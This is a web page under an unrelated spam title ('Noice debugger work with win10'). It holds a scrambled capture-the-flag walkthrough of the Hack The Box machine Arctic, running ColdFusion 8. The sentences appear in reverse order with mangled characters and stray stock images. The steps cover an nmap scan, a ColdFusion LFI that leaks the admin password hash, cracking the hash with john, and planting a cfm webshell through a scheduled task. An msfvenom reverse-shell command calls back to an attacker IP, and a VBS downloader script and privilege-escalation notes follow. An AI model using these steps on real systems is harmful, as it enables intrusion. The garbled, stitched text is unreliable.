Noice debugger work with win10
![noice debugger work with win10 noice debugger work with win10](https://us.v-cdn.net/6026774/uploads/editor/ou/s8ck63fdkq4j.jpg)
Noice debugger work with win10 windows#
The windows 2008 and the privileges lead me to think maybe we need to use the SeImpersonatePrivilege priv esc. SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeCreateGlobalPrivilege Create global objects Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled We have a lot of priviledges: PRIVILEGES INFORMATION OS Name: Microsoft Windows Server 2008 R2 Standard We get a whole bunch of data, let’s see what we have! Host Name: ARCTIC savetofile " Powerless.bat", 2 '//overwrite > script1.vbs write xHttp.responseBody > script1.vbsĮcho. echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") > script1.vbsĮcho dim bStrm: Set bStrm = createobject("Adodb.Stream") > script1.vbsĮcho xHttp.Open "GET", " ", False > script1.vbsĮcho. I have a VBA script which works like a wget. Let’s get my favourite powerless script across. We get a reverse shell and the user flag! Noice! Let’s host that using python and change our scheduled task to grab this file instead. That runs and creates our reverse shell payload The syntax for this is: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.18 LPORT=9002 -f raw > yekki-rs.jsp Ok, instead of trying to do that, let’s make a reverse shell payload! It doesn’t look like it can find cmd.exe! How strange! Using that webshell, let’s try and whoami /all So it’s must easier and less things can go wrong to make a new one! The reason to call it “2” is that I have no idea if it will overwrite files or fail at that. Let’s upload it and call the file yekki2.cfm. Looking at the script, we needed to make a change before we were so reckless in our uploading! I think this will be because I changed the name of the file. Hmm, we get an error when running a command: So maybe it needs to be a jsp not a cfm.Ī CFM does work (as does a jsp) so either is good! Ah in my autocomplete on the File path, it was a. You’ll notice it’s a jsp, not sure why this is. We get a hit on our webserver! And our file is there! I guess we need to use that with \scripts on the end C:\ColdFusion8\wwwroot\CFIDE\scripts\yekki.cfm Heading back to the setting summary, we can see the CFIDE mapping Make sure “Save output to a file” is ticked and we need to confirm where to save it.
![noice debugger work with win10 noice debugger work with win10](https://www.raspberrypi.org/app/uploads/2021/01/JPEG-image-25E1B12A1CC5-1-800x600.jpeg)
![noice debugger work with win10 noice debugger work with win10](https://miro.medium.com/max/1400/1*OiQ5Xi1CyO6IwHgoo_8BTA.jpeg)
We can’t upload a file, but we can access a URL, so let’s host our. Under “Debugging & Logging” we have the scheduled tasks. To upload a file, we need to set up a scheduled task. Luckily on kali there is a default cfm webshell located in /usr/share/webshells/cfm/cfexec.cfm Looking in the folder, mostly the files are js or cfm. So we should be able to upload a payload to there and execute it to get a webshell or reverse shell or whatever we want! We can see that any uploaded files get saved at CFIDE/scriptsĭouble checking the directory listing earlier, we have access to that folder. Now i’ve exploited this application before, so I have an idea! Let’s go back to the admin login and see if the creds work! Let’s check the password: john -show -format=Raw-SHA1 hash.txt It comes up with a whole heap of things it could be but after a while it lets us know it’s cracked. Copy the hash into a text file and run john: john hash.txt -w /usr/share/wordlists/rockyou.txt
Noice debugger work with win10 password#
I’d say that password is hashed, a quick google tells us the normal hash for this is SHA1. There is a known LFI in CFIDE, which lets you see the admin password, accessing it via. Looking in that folder, we find Administrator, which brings us a login screen! Known to have a load of vulnerbilities depending on version! We know what CFIDE is, that’s Adobe Cold Fusion. I have no idea what fmtp might be, let’s see if we can view it in a browser. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portĭevice type: general purpose|phone|specialized We get a few results: PORT STATE SERVICE VERSIONĤ9154/tcp open msrpc Microsoft Windows RPC Start off as usual with our nmap scan nmap -sC -sV -O -oN nmap/initial 10.10.10.11 -vv It’s time to get a bit cooooooool, we are gunna have a look at Artic!